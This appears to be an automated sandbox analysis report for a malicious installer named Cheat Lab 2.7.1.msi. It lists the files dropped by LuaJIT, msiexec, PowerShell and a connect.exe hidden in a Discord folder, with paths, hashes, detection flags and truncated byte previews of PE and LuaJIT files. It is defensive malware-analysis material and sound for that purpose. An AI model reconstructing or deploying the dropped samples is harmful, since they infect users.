                                                                                                                                                                      SHA1:BEF96A36BA40446FBE5596D50BBC9E9ADC154D3B
                                                                                                                                                                      SHA-256:345911E89D241BC814827AEAB2F59004AF713BD088098634440EFF1B237DAF3D
                                                                                                                                                                      SHA-512:CD1EE8813C385213C1EDA31B8C460FF21ED25F228D39DA58A95B1A5CCD5E71E4B7964A2BCC22161730C92C68FBA3FE8EFF2418FEF50B8CEBBBA9CC5C303538C7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129872
                                                                                                                                                                      Entropy (8bit):6.038065588362103
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:2pA3JKOc1a+6lXmdTstTIezbdVR6KuyZze638dtoXKtmQkxE08yaU7L2SyCla:22bc5ApIsBVRVCtRkxE08yaC7yj
                                                                                                                                                                      MD5:5DE081465476323E3DCBE97602183C87
                                                                                                                                                                      SHA1:D3BD6A912A0FEF185ED8E02B9C411809B20EC7C0
                                                                                                                                                                      SHA-256:9C0ED1349DA4BA4449559FCEEBAC4556ADD7009684367151673A2F52200F3E84
                                                                                                                                                                      SHA-512:20CFB8DC88F81BE8356FB3EDA4AB74C0F137FBF4E3838FA545F47B941B1E10A344B8733F711C360964FC40F086EC986D689EB6EFDD5029D354D11F2BB004C4BD
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:.LJ..........-.......8...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........?.......-...-...4...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L.............R........,.F.....XGe.UGd.*G....G.XG.*G....G.XG..*G....G.XG.*G....G.XG.*G....G.XG..*G....G.XG.*G....G.XG..*G....G.XG..*G....G.XG..)(...&(.XG..+...XG..+....3......XG..*...XG..*...XG..::..'&..* ..-G..:H..8*HG'3..-G..:H..8.HG.G...I&..J .BG....G.-G..BG....G.8..*-G..<..G-G..:H..8 HG-G..:H..8/HG*....G/..I3..J..BG...)G.-G..)I.BG....G.8..:8&) -G..*I..4J..:K..>K.J:K..>K.JBG... G.*...'3...G...I:..J&..K .BG....G.-G..:H..8 HG-G..:H..8/HG.G/..I3..J..BG...)G.8&) .G...H&.&*HG-G..:H..8 HG'3..*...*(..-G..:H..8/HG.G/..I3..J..BG...)G.*=..8&) '...8..*'...-G..*I..4J..:K..>K.J:K..>K.J>..JBG... G..G...I*..J&..K .BG....G.-G..:H..8/HG-G..:H..8)HG.G)..I...J(.BG...3G.'(..*...8 3/-G..:H..8)HG-G..:H..83HG.G3..I(..J=.BG....G.8/.)'=..-G..:H..83HG-G..:H..8.HG.G...I

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3094
                                                                                                                                                                      Entropy (8bit):5.33145931749415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                      MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                      SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                      SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                                                                                                      SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2232
                                                                                                                                                                      Entropy (8bit):5.379677338874509
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:tWSU4YymI4RIoUeW+gZ9tK8NPZHUxL7u1iMuge//ZeUyus:tLHYvIIfLgZ2KRHWLOugos
                                                                                                                                                                      MD5:85AAA19A9B0A06E085BF32A33F55A839
                                                                                                                                                                      SHA1:D0803618296D04D63ADA3215CC97A7B32EC91BE8
                                                                                                                                                                      SHA-256:AC45C6B577CF08455F66BF9ED464FBEF89AA75F65254CD351931A6EC8F2D098A
                                                                                                                                                                      SHA-512:B11F41129E5EB7A21FD02820BA73B4815B3AB1A0DFBC284764F08E094D84F8DFC414318C0ED6DF6E83688E8570F30E305311D341ABC685543D8319C9E4CAB543
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAB91.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Cheat.Lab.2.7.0.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: , Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: winrar-611br.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Firefox-x64.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDeskAPP.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: 6p2LSuB1em.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: AnyDesk.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: MERC_PG_MDLS.msi, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAC3E.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAC5E.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAC8E.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIACBE.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAD1D.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAEA5.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAEC5.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSIAEF5.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSID74E.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSID76E.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxmhnkre.qdp.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
